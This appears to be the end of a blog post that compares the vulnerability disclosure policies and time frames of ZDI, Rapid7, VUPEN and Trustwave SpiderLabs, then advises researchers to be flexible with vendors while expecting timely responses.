  • ZDI Disclosure Policy - Notification emails: security@, support@, info@, secure@. Receipt: 5 days, then telephone contact; 5 days for a telephone response, then an intermediary. Status updates: not defined. Resolution: 6 months. Disclosure: 15 days if no response is provided after initial notification; up to 6 months if a notification response is provided.
  • Rapid7 - Notification emails: not defined. Receipt: 15 days after phone/email contact. Status update and resolution time frames: not defined. Disclosure: 15 days, then disclosure to CERT/CC.
  • VUPEN - Notification only to customers under contract; receipt, status update, and resolution time frames not defined. Disclosure: only to customers.
  • Trustwave SpiderLabs - Notification emails: not defined. Receipt: 5 days. Status updates: 5 days. Resolution: not defined. Disclosure: if the vendor is unresponsive for more than 30 days after initial contact, potential disclosure is decided by Trustwave management.

What to do?

Consider all of the above approaches, and let the vendor know your policy as you disclose so they are aware. At the end of the day, it's always good to be flexible and as accommodating as possible to the vendor. However, also make sure the effort is mutual: they should be responding in a reasonable time and making progress toward addressing the issue.



How do you handle disclosure? Let us know in the comments below!


